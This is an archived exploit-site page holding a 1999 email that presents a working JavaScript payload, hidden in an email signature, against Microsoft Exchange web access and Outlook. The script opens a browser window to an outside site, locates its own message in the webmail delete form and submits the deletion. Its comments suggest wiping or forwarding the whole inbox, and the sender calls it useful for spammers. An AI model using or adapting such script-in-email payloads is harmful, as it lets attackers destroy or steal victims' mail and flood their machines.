what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ms.exchange.outlook.javascript.txt

ms.exchange.outlook.javascript.txt
Posted Aug 17, 1999

Vulnerabilities in Microsoft Exchange server allow remote attacker to delete user inbox and launch Denial of Service attack with embedded JavaScript.

tags | exploit, remote, denial of service, javascript, vulnerability
SHA-256 | 8240bd3653abc06d942529189480b510713dfb256e3917b711e918b1e977c20e

ms.exchange.outlook.javascript.txt

Change Mirror Download
Date: Fri, 5 Mar 1999 11:30:56 -0000 
From: Mat Newman <Mat@and.co.uk>
To: "'packetstorm@genocide2600.com'" <packetstorm@genocide2600.com>
Subject: Exchange server web access


You may have heard about this but...

If someone is accessing Exchange server via the web then you can embed
javascript into the email to get it to delete the contents of the users
inbox. If they're not using the web but just ordinary Outlook then you can
still do things like open up 10,000 browser windows etc. - useful for
spammers!)

The simplest way to do this if you're using exchange is to put the js into
your signature (it's not in the one below!) as follows: (in
winnt\profiles\user\Application Data\Microsoft\Shared\Signatures)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
<html>

<head>
<meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type">
<meta content="Microsoft FrontPage 3.0" name="GENERATOR">
<title></title>
</head>

<body>

<p><font face="Arial" size="2">!!!CAUTION VIRUS VERSION!!!</font></p>

<p><font face="Arial" size="2">Mat Newman</font> <br>
<script>
<!--

// Here we check to see if we're using IE4 web access

if (window.opener == null){
alert("You are using Outlook!");
myWin =
window.open("http://www.doodie.com/index.cfm?daily=140","","width=800,height
=500,status=yes,toolbar=yes,menubar=yes");
// Wouldn't it be annoying if I opened up 10,000 browsers?
}else{

// Check to see which message we are...

var msg_us_index = 0;
var msg_us_id = window.top.name;
for (var i = 0; i<window.opener.msg_fr.deleteform.length; i++){
if (window.opener.msg_fr.deleteform.elements[i].value == msg_us_id){
msg_us_index = i;
i = 100000;
}
}

// Here we delete ourselves
alert("Now you see me, now you don't!");
// Check the delete box for the latest message
window.opener.msg_fr.deleteform.elements[msg_us_index].checked = true;
// Now do the deletion
window.opener.msg_fr.deleteform.submit();
// Now shut us down
window.close();

// We could simply have checked all the delete boxes to clear the inbox.
Perhaps we could forward them on first...

} // Check on Web Access
//-->
</script><font face="Arial" size="1">Alpha-Numeric Developments
Limited</font> <br>
</body>
</html>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close